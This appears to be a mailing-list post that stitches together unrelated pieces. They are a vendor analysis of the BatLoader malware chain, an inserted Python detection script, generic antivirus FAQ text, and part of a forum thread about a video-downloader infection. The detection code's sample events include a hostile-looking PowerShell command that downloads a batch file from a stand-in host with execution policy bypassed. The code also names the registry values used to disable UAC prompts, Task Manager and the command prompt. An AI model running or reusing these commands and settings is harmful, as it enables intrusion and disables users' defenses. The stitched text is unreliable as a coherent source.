Video Downloader Pro Malware


Denisha Cerniglia

Jul 27, 2024, 6:28:33 PM
to todilama

VMware Carbon Black Managed Detection and Response (MDR) analysts constantly handle security incidents in customer environments and track emerging and persistent malware campaigns. One threat that has been particularly prevalent over the last couple of months is BatLoader. Named by Mandiant [1], BatLoader is initial-access malware that relies heavily on batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. The operators use search engine optimization (SEO) poisoning to lure users into downloading the malware from compromised websites. Because the chain is built from living-off-the-land binaries, it is hard to detect and block, especially early in the attack.

While reviewing the information on BatLoader already published on the public internet, we found some confusion as to whether BatLoader and Zloader, a banking trojan, are one and the same. For example, looking up the sample discussed here on VirusTotal, several antivirus engines classify it in the Zloader family, and the same file is referenced in community-contributed IOC collections for both Zloader and BatLoader.

In many ways, BatLoader resembles the previously known Zloader. Our team analyzed the initial steps of compromise for the two malware samples presented in the chart below to provide an accurate comparison.

The two families share three substantial traits: SEO poisoning as the lure, Windows Installer as the delivery vehicle, and native OS binaries during the delivery and execution process.

Note: BatLoader continues to evolve, and we have seen different execution steps in different samples. Although the core functionality remains the same, the operators vary the scripts (both in name and content), possibly to make detection more difficult. For simplicity, we analyzed only one of the three variations we encountered. The IOC section below lists the scripts and tools used across all the attack chains we observed.

The inline PowerShell script, executed during the software installation, kicks off the infection by downloading the first BatLoader script, update.bat, with the Invoke-WebRequest cmdlet, as shown in Figure 6.

The PowerShell script scripttodo.ps1 runs some discovery commands and then downloads and installs a copy of Gpg4win (a legitimate email and file encryption package) and NSudo.exe, a tool used to launch programs with elevated privileges.

NSudo is then used to impair defenses by setting the registry values ConsentPromptBehaviorAdmin (UAC elevation prompts), Notification_Suppress (Windows Security notifications), DisableTaskMgr, DisableCMD and DisableRegistryTools. Together these settings strip the user of the tools they would normally use to notice and undo the infection, making remediation on the device difficult.
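The two stages above, the installer-launched PowerShell fetching update.bat and the NSudo registry changes, are the points at which a practitioner would want detection logic. The following is an added example, not code from the original post or from Carbon Black: it runs simple rules over constructed Sysmon-style events (event 1 = process create, 13 = registry value set). The registry paths at which Windows honours the named values, the values treated as "impairing" (for instance ConsentPromptBehaviorAdmin = 0), the msiexec.exe parent check and all sample events are this example's assumptions; the post lists only the value names.

```python
"""Detection logic for two BatLoader stages: inline PowerShell pulling a .bat
with Invoke-WebRequest, and registry-based defense impairment via NSudo.
Events are constructed samples in a Sysmon-like shape, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int                 # 1 process create, 13 registry value set
    image: str                    # process that produced the event
    command_line: str = ""        # event 1 only
    parent_image: str = ""        # event 1 only
    target_object: str = ""       # event 13: registry path including value name
    details: str = ""             # event 13: Sysmon renders DWORDs as "DWORD (0x...)"


@dataclass
class Finding:
    stage: str
    reason: str
    evidence: str


# Value names from the post, keyed by the tail of the registry path where Windows
# reads them, with the settings that impair the defense.  Paths and "impairing"
# values are this example's assumption; the post lists only the names.
IMPAIRMENT_VALUES = {
    r"CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin": ({0}, "UAC elevation prompt disabled for administrators"),
    r"Security Center\Notifications\Notification_Suppress": ({1}, "Windows Security notifications suppressed"),
    r"Policies\System\DisableTaskMgr": ({1}, "Task Manager disabled"),
    r"Policies\Microsoft\Windows\System\DisableCMD": ({1, 2}, "command prompt disabled"),
    r"Policies\System\DisableRegistryTools": ({1, 2}, "Registry Editor disabled"),
}

# Invoke-WebRequest plus its Windows PowerShell aliases (iwr, curl, wget).
DOWNLOAD_CMDLET = re.compile(r"\b(invoke-webrequest|iwr|curl|wget)\b", re.I)
BATCH_FILE = re.compile(r"[\w.-]+\.(bat|cmd)\b", re.I)
DWORD = re.compile(r"DWORD \(0x([0-9A-Fa-f]+)\)")


def check_download_stage(ev: Event):
    """Stage 1: PowerShell fetching a batch script, as the inline script does
    when it retrieves update.bat.  A msiexec.exe parent (assumed here to be
    how the installer launches it) is recorded but not required."""
    if ev.event_id != 1 or not ev.image.lower().endswith("powershell.exe"):
        return None
    if DOWNLOAD_CMDLET.search(ev.command_line) and BATCH_FILE.search(ev.command_line):
        reason = "PowerShell downloading a batch script"
        if ev.parent_image.lower().endswith("msiexec.exe"):
            reason += " from a Windows Installer package"
        return Finding("download_stage", reason, ev.command_line)
    return None


def check_impairment(ev: Event):
    """Stage 2: one of the named registry values set to a value that removes a
    user-facing control.  Matching on the path tail also covers HKU\\<SID>\\..."""
    if ev.event_id != 13:
        return None
    target = ev.target_object.lower()
    for tail, (bad_values, reason) in IMPAIRMENT_VALUES.items():
        if target.endswith(tail.lower()):
            m = DWORD.search(ev.details)
            if m and int(m.group(1), 16) in bad_values:
                return Finding("defense_impairment", reason, ev.target_object)
    return None


def analyze(events):
    """Return one Finding per event that matches either stage."""
    findings = []
    for ev in events:
        f = check_download_stage(ev) or check_impairment(ev)
        if f:
            findings.append(f)
    return findings


def chain_detected(events):
    """True only when both stages appear: a lone UAC tweak by an admin, or a
    lone PowerShell download, is not enough to call this BatLoader."""
    stages = {f.stage for f in analyze(events)}
    return {"download_stage", "defense_impairment"} <= stages


# Constructed sample telemetry (hostnames, paths and SIDs are made up).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event(1, PS, parent_image=r"C:\Windows\System32\msiexec.exe",
          command_line=r'powershell -ep bypass -c "Invoke-WebRequest http://example.invalid/update.bat -OutFile C:\Users\Public\update.bat"'),
    Event(13, r"C:\Windows\System32\reg.exe", parent_image=r"C:\Users\Public\NSudo.exe",
          target_object=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
          details="DWORD (0x00000000)"),
    Event(13, r"C:\Windows\System32\reg.exe", parent_image=r"C:\Users\Public\NSudo.exe",
          target_object=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
          details="DWORD (0x00000001)"),
    # benign: an administrator restoring the default UAC prompt level
    Event(13, r"C:\Windows\regedit.exe",
          target_object=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
          details="DWORD (0x00000005)"),
    # benign: PowerShell fetching a JSON document, no batch script involved
    Event(1, PS, command_line='powershell -c "Invoke-WebRequest https://example.invalid/status.json"'),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.stage}] {f.reason}: {f.evidence}")
    print("BatLoader-like chain:", chain_detected(SAMPLE_EVENTS))
```

The benign events show why chain_detected requires both stages: a single ConsentPromptBehaviorAdmin change or a single PowerShell download is common administrative activity, and it is the combination within one host's timeline that matches the behaviour the post describes.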

The final payloads dropped after infection typically include two executables (e.g. d2ef5.exe, p9d2s.exe) and a DLL (e.g. f827.dll, d655.dll). In every infection we observed, one of the executables was a known-malicious file attributed to the Ursnif/Gozi banking trojan family; the other appeared to be the Arkei/Vidar infostealer. Once these executables are set to run, the main DLL is executed as well. In some incidents we were able to confirm that the DLL was a Cobalt Strike stager.

New threats are constantly emerging. At VMware Carbon Black we work around the clock to ensure that our products keep our customers safe from those very threats and offer MDR, the last wall of defense, to fill the gap between the known, evolving and unknown threats.

BatLoader is a good example of the benefit of MDR. As our team has detailed, this malware is stealthy and embeds itself thoroughly in the impacted host. The Carbon Black sensor detects specific behaviors of the malware and generates alerts for further analysis, but the alerts by themselves did not paint a holistic picture of the attack. That is a challenge for any team without the resources to conduct the kind of in-depth threat hunt that MDR provides.

The Endpoint Standard product receives updates for known malicious hashes and blocks Known or Suspect malware files from executing through behavioral analysis. Even where the initial payload circumvents detection, it is highly likely that the malware will trigger other alerts as it runs that indicate a more complex attack, such as the ones highlighted below.

MDR Threat Analysts detected this change in tactics and initiated the investigation that led to this write-up of the nuances and vital differences between BatLoader and Zloader and how they could affect customer environments. The IOCs related to this malicious behavior are documented below to ease the next steps for customers, and Threat Analysts are available for follow-up questions and support.

First observed in July 2022, this malware has already become a commonplace threat against Carbon Black MDR customers. The following diagram illustrates its prevalence across sectors, with business and financial services being prime targets. Since the VMware Carbon Black team first observed it there have been at least three waves of infection, with more to be expected.

This shows once again that as the threat landscape changes, the security industry as a whole needs the tools, knowledge and collaboration to detect and block newly discovered techniques. At VMware Carbon Black, the MDR team and TAU rely heavily on communication and collaboration to ensure, in a timely manner, that our products can stand against these threats as they evolve. Our teams measure success by their ability to adapt and persevere on this ever-changing battlefield.

A false positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A false positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

A trojan-downloader is a type of trojan that installs itself on the system and waits until an Internet connection becomes available to connect to a remote server or website in order to download additional programs (usually malware) onto the infected computer.

Trojan-downloaders are also commonly distributed as disguised files attached to spam emails. The attachments are typically labelled with legitimate-sounding program or document names, such as 'invoice' or 'accounts.exe', as a simple form of social engineering. If the attachment is opened, the trojan-downloader is installed.

Once a trojan-downloader has been installed on a machine, it will try to contact a remote server or website, where it can either directly fetch additional files for download or find further instructions from the attackers on where to find the files.

A couple of days ago I downloaded YTD video downloader and after that my computer started to act strange. At first it froze and I had to reboot manually. During boot it froze again and I had to turn it off manually once again. It diagnosed my computer and I had to restore. After the restore I was able to log on and use the computer for a few minutes until it froze again and I had to reboot manually once more. Every time I try to turn off the computer it freezes, and after that I have to restore, as the first boot after a freeze never works.

At least it works decently now; it doesn't freeze at the desktop after a few minutes and I can use some programs, but it is very, very slow. And I detected that my antivirus program and firewall are inactive and unable to start up. I've tried using AdwCleaner and it found 21 infected files, but as it forces me to reboot to remove the infected files it keeps freezing and after that it gets stuck at boot, which leads to another manual reboot and another restore. I'm pretty much stuck in a loop as I'm unable to properly turn off the computer.

I will be guiding you as we go forward. I do need to see other diagnostic information from this system so that I can see about pinning down the source of this issue.
I would like to ask that you always attach any report or file I ask for, from time to time.
Some initial remarks.

All the freeze-ups on shutdown, on starting up, or while running the system are obviously not good to have. But having a good, solid operating system is a must-have, otherwise whatever one tries may be for nought.

I need to know the version of Windows on this machine, whether you have a Windows operating system DVD, and whether you have a backup of this system from before.
Also the brand name of the antivirus.
Please let me know the brand name of the antivirus on this machine. Is it McAfee, TrendMicro, Norton / Symantec, Security Essentials, Avast, BitDefender, Kaspersky, or some other brand? Which one exactly?

I have Windows 10. My computer keeps freezing and forces me to manually restart it; every time I restart the computer it automatically restores (to a previous point when it worked well, I guess). But it's the same issue when I enter Windows afterwards.

I started tonight to download and install the first link you gave me. I was pretty sure that the computer would restart itself afterwards, so I took some pictures so you know what happened. It's always the same. This is what happens:

First picture, Automatic Repair, shows every time I start my computer. Exactly the same happens if I press restore or cancel. So this time I pushed restore. The computer starts restoring and this takes approximately 10-15 minutes.

So, after 10-15 minutes of restoring I enter Windows and it takes another 5 minutes before I can click on anything, just loading. When I finally can, I run the link (2nd picture) and it starts loading for about 2-3 minutes, then my screen turns black and it restarts itself (3rd picture). The HP logo turns up and the five small dots in the 4th picture run for 15 seconds and freeze.

Actually, when this first happened, like 2 weeks ago, my computer started a Windows update and failed it because of the issue above.
I noticed that both my firewall and antivirus were disabled and have been since this first appeared. If I try to start the firewall, you know what happens: it freezes.
